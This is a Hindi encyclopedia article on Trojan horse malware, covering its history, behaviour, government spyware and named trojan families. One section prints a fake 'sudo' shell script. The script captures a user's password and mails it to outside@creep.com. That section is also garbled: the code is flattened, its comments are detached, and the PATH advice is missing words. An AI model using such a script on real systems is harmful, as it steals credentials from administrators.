ट्रोजन हॉर्स (कंप्यूटिंग)

संगणना में, एक ट्रोजन हॉर्स एक मैलवेयर है जो उपयोगकर्ताओं को उसके वास्तविक इरादे के बारे में गुमराह करता है। यह शब्द भ्रामक ट्रोजन हॉर्स की प्राचीन ग्रीक कहानी से लिया गया है ,जिसके कारण ट्रॉय शहर का पतन हुआ। ट्रोजन आमतौर पर सामाजिक अभियान्त्रिकी के किसी रूप के माध्यम से फैलते हैं; उदाहरण के लिए, जहाँ एक उपयोगकर्ता को सहज दिखने दिखने के लिए एक गुप्त ईमेल अटैचमेंट निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सोशल मीडिया पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। हालांकि उनका पेलोड कुछ भी हो सकता है, कई आधुनिक रूप से गुप्तद्वार के रूप में कार्य करते हैं ,एक नियंत्रक से संपर्क करते हैं जो प्रभावित परिकलक पर अनाधिकृत पहुंच प्राप्त कर सकते हैं। रैंसमवेयर हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।

परिकलक वायरस और वर्म के विपरीत, ट्रोजन आमतौर पर खुद को अन्य दस्तावेजों में अन्तःक्षेप करने की कोशिश नहीं करते हैं या अन्यथा खुद को प्रचारित नहीं करते हैं।

शब्द का प्रयोग
यह स्पष्ट नहीं है कि कब और कहां अवधारणा, और इसके लिए यह शब्द पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले यूनिक्स नियमावली ने माना कि इसके पाठक दोनों को जानते थे:

एक और प्रारंभिक संदर्भ 1974 में मॉलटिक्स परिकलक प्रणाली में अतिसंवेदनशीलता विश्लेषण पर अमेरिकी वायु सेना की सम्बन्ध में है।

इसे केन थॉम्पसन द्वारा 1983 के अपने ट्यूरिंग पुरस्कार स्वीकृति व्याख्यान "भरोसेमंद विश्वास पर विचार" में लोकप्रिय बनाया गया था, उपशीर्षक: किस हद तक एक बयान पर भरोसा करना चाहिए कि एक कार्यक्रम ट्रोजन हॉर्स से मुक्त है? सॉफ्टवेयर लिखने वाले लोगों पर भरोसा करना शायद ज्यादा जरूरी है। उन्होंने उल्लेख किया कि वे मॉलटिक्स की सुरक्षा पर एक प्रतिवेदन से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे

व्यवहार
एक बार इंस्टॉल हो जाने पर, ट्रोजन कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई इंटरनेट पर एक या एक से अधिक आदेश और नियंत्रण (C2) सर्वर से संपर्क करते हैं और निर्देश का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए पोर्ट के एक विशिष्ट सेट का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, दुर्भावनापूर्ण कार्रवाई के लिए एक प्रतिनिधि के रूप में इसका उपयोग करते हुए, अन्य मैलवेयर ट्रोजन को संभावित रूप से "अधिकार" कर सकते हैं।

जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए स्पाइवेयर को कभी-कभी गोववेयर कहा जाता है। गोववेयर आमतौर पर एक ट्रोजन सॉफ़्टवेयर है जिसका उपयोग लक्ष्य कंप्यूटर से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह के सॉफ़्टवेयर के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है। गोववेयर ट्रोजन के उदाहरणों में स्विस मिनीपैंजर और मेगापैंजर और जर्मन "राज्य ट्रोजन" उपनाम R2D2 शामिल है। जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से कूट किए जाने से पहले स्मार्टफोन डेटा तक पहुंच बनाकर काम करता है।

हैकर्स के बीच बॉटनेट की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, ट्रोजन अधिक आम होते जा रहे हैं जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं।बिटडिफेंडर द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, "ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा हैै"। ट्रोजन का वर्म से संबंध है, क्योंकि वे वर्म की मदद से फैलते हैं और उनके साथ इंटरनेट पर यात्रा करते हैं। बिटडिफेंडर ने कहा है कि लगभग 15% परिकलक एक बॉटनेट के सदस्य हैं, आमतौर पर जो ट्रोजन संक्रमणों द्वारा भर्ती किए जाते हैं।

लिनक्स उदाहरण
ट्रोजन हॉर्स एक ऐसी योजना है जो कुछ स्पष्ट कार्य करने का दावा करता है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करता है। एक आसान योजना लिनक्स सुडो कमांड का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका जैसे में प्रतिलिपि बनाया जाता है। यदि कोई प्रशासक उस निर्देशिका में होता है और सुडो को निष्पादित करता है, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है: : # stty -echo /bin/echo -n "Password for `whoami`: " read x /bin/echo "" stty echo echo $x | mail -s "`whoami` password" outside@creep.com sleep 1 echo Sorry. rm $0 exit 0 आदेश प्रणाली आधारित ट्रोजन हॉर्सेस को रोकने के लिए, पथ प्रविष्टि= पर्यावरण चर अंत में स्थित होना चाहिए। उदाहरण के लिए:.
 * 1) sudo
 * 1) Turn off the character echo to the screen.
 * 1) Turn back on the c8haracter echo.

निजी और सरकारी

 * एएनओएम - एफबीआई
 * 0ज़ाफटिस / आरटूडीटू स्टैंटस ट्रोजनर – DigiTask
 * डार्ककॉमेट - सीआईए / एनएसए
 * फिनफिशर - लेंच आईटी समाधान / गामा अंतर्राष्ट्रीय
 * दाविंसी / गैलीलियो आरसीएस - हैकिंग टीम
 * मैजिक लालटेन - एफबीआई
 * सनबर्स्ट-एसबीआर/आरामदायक भालू (संदिग्ध)
 * टीएओ क्वांटम/फॉक्सैसिड - एनएसए
 * योद्धा गौरव - जीसीएचक्यू

सार्वजनिक रूप से उपलब्ध

 * ईजीएबीटीआर - 1980 के दशक के अंत में
 * नेटबस - 1998 (प्रकाशित)
 * मोबमैन द्वारा उप7 - 1999 (प्रकाशित)
 * पीछे का छिद्र - 1998 (प्रकाशित)
 * असभ्य व्यक्ति - 2002 (प्रकाशित)
 * बिफ्रोस्ट ट्रोजन - 2004 (प्रकाशित)
 * डार्ककॉमेट - 2008-2012 (प्रकाशित)
 * ब्लैकहोल शोषण किट - 2012 (प्रकाशित)
 * घोस्ट आरएटी - 2009 (प्रकाशित)
 * मेगापैंजर बुंडेस ट्रोजनर - 2009 (प्रकाशित)
 * Leurak द्वारा MEMZ - 2016 (प्रकाशित)

सुरक्षा शोधकर्ताओं द्वारा पता लगाया

 * बारह टोटके - 1990
 * क्लिकबॉट.ए - 2006 (खोजा गया)
 * ज़्यूस - 2007 (खोजा गया)
 * पूर्वदृश्य ट्रोजन - 2011 (खोजा गया)
 * ज़ीरोएक्सेस - 2011 (खोजा गया)
 * कोबफेस - 2008 (खोजा गया)
 * वंडो- 2009 (खोजा गया)
 * कोरफ्लड - 2010 (खोजा गया)
 * टिनी बैंकर ट्रोजन - 2012 (खोजा गया)
 * सोवा - 2022 (खोजा गया)
 * शेडुन एंड्रॉइड मैलवेयर - 2015 (खोजा गया)

पूंजीकरण
परिकलक शब्द "ट्रोजन हॉर्स" प्राचीन शहर ट्रॉय के प्रसिद्ध ट्रोजन हॉर्स से लिया गया है। इस कारण "ट्रोजन" को अक्सर पूंजीकृत किया जाता है। हालाँकि, जबकि शैली निर्देश और शब्दकोश अलग-अलग होते हैं, कई लोग सामान्य उपयोग के लिए छोटे अक्षर "ट्रोजन" का सुझाव देते हैं।

यह भी देखें

 * परिकलक सुरक्षा
 * कोयल का अंडा (रूपक)
 * साइबर जासूसी
 * नाचने वाले सूअर
 * शोषण (परिकलक सुरक्षा)
 * औद्योगिक जासूसी
 * फ़िशिंग
 * कम से कम विशेषाधिकार का सिद्धांत
 * गोपनीयता-आक्रामक सॉफ्टवेयर
 * दूरस्थ प्रशासन
 * दूरस्थ प्रशासन सॉफ्टवेयर
 * उल्टा कनेक्शन
 * दुष्ट सुरक्षा सॉफ्टवेयर
 * धोखाधड़ी करने वाले
 * तकनीकी सहायता घोटाला
 * परिकलक वायरस और वर्म्स की समयरेखा
 * ज़ोंबी (परिकलक विज्ञान)